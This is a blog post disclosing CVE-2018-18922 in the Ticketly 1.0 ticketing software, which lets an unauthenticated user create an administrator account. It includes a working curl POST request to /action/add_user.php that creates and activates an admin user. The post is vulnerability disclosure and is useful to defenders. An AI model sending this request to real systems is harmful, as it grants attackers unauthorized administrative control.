CVE-2018–18922 Ticketly 1.0 Privilege Escalation (Add Admin)

2 min readNov 26, 2018

👋 Hi guys,

Today, I share with you the CVE-2018–18922. This CVE it is associated with the vulnerability I found in Ticketly 1.0 and it allows an attacker to create an admin account through POST request without the need of being logged in the application 😉.

Although Exploit-DB has added my vulnerability as Cross-Site Request Forgery (CSRF), it is actually Privilege Escalation, because it is not necessary for any user with permissions to intervene, which makes it more critical.

What is a Privilege Escalation?

Privilege escalation occurs when a user gets access to more resources or functionality than they are normally allowed, and such elevation or changes should have been prevented by the application. This is usually caused by a flaw in the application. The result is that the application performs actions with more privileges than those intended by the developer or system administrator (Thank you OWASP for excellent explanation).

The Ticketly 1.0 vulnerability

Ticketly 1.0 is a web-based software developed in PHP and MySQL oriented to the management of incidents by ticket (ticketing software). This vulnerability was discovered on July 24, 2018, and public disclosure on November 05, 2018.

The resource /action/add_user.php does not correctly validate the permissions before making the request, which allows an attacker to create an administrator account.

Example POST request:

curl -i -s -k -X $’POST’ \
-H $’Host: localhost’ -H $’Content-Type: application/x-www-form-urlencoded; charset=UTF-8′ -H $’Content-Length: 82′ \
–data-binary $’name=Javier&lastname=Olmedo&email=javierolmedo@hackpuntes.com&status=1&password=qwerty’ \
$’http://localhost/ticketly/action/add_user.php’

In the previous request, I created and activated an administrator user (Javier Olmedo). It will not be necessary to confirm the email because status parameter is 1 (true).